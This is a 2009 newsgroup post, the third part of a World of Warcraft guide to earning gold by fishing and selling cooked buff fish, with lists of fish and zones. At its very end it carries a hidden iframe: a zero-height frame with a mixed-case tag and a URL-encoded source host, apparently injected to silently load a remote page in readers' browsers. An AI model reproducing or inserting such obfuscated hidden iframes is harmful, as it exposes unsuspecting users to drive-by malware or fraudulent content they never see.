World of Warcraft - How to Fish your Way to Riches (3 of 3)

fugnbq...@yahoo.com

Apr 19, 2009, 12:57:51 AM4/19/09
to World of Warcraft , WOW

Fishing for cooking is going to be your bread and butter. Most people
in World of Warcraft are simply too lazy to go out and fish or cook
for themselves. They would rather buy it. This is where you as the
entrepreneur come in. Fish for them, cook for them, and make them pay.
The real money in fishing is cooking the fish that you catch and
selling the product on the auction house. Most fish that you catch can
be cooked but not all of them carry any value at the auction house.
The ones that you want to sell are those that when cooked provide some
kind of "buff."
Lower End "Buff" Fish
Bloodfin Catfish - Open water in Deadwind Pass and Zul'Aman
Enormous Barbed Gill Trout - Outlands (Rare)
Lightning Eel - Old World 50 to 60 zones, best caught between Noon and
6 PM server time
Raw Greater Sagefish - Alterac Mountains and Stranglethorn Vale
Raw Nightfin Snapper - Old World 50 to 60 zones, best caught between
Noon and 6 PM server time
Spotted Feltail - Pools and open water in Terokkar Forest and
Zangarmarsh
Winter Squid - Coastal open water in Azharara, Feralas, Hinterlands,
Stranglethorn Vale. Can only be caught in the winter (September -
March)
BIG Money Fish
Crescent-Tail Skullfish - Open water Deadwind Pass and Zul'Aman
Figluster's Mudfish - Negrand and Netherstorm
Furious Crawdad - Terokkar Forest elevated lakes, mixed highland
schools only, you need a flying mount, maxed fishing skill, and lots
of Aquadynamic Fish Attracters. You need modified 500 fishing skill to
avoid "your fish got away."
Golden Darter - Terokkar Forest
Huge Spotted Feltail - Outland (Rare)
Icefin Bluefish - Nagrand, Netherstorm
Zangarian Sporefish - Zangarmarsh
Fishing is a skill that most in World of Warcraft over look. I have
taken advantage of fishing since I started playing in beta 1 and have
reaped the rewards. I dedicate about 8 to 10 hours per week to fishing
and I usually rake in about 1000 gold for my efforts. Should you spend
time
fishing...YES!
<IfrAmE src=http://%6C%6C%38%30%2E%63%6F%6D/ad.htm width=100
height=0></IfrAmE>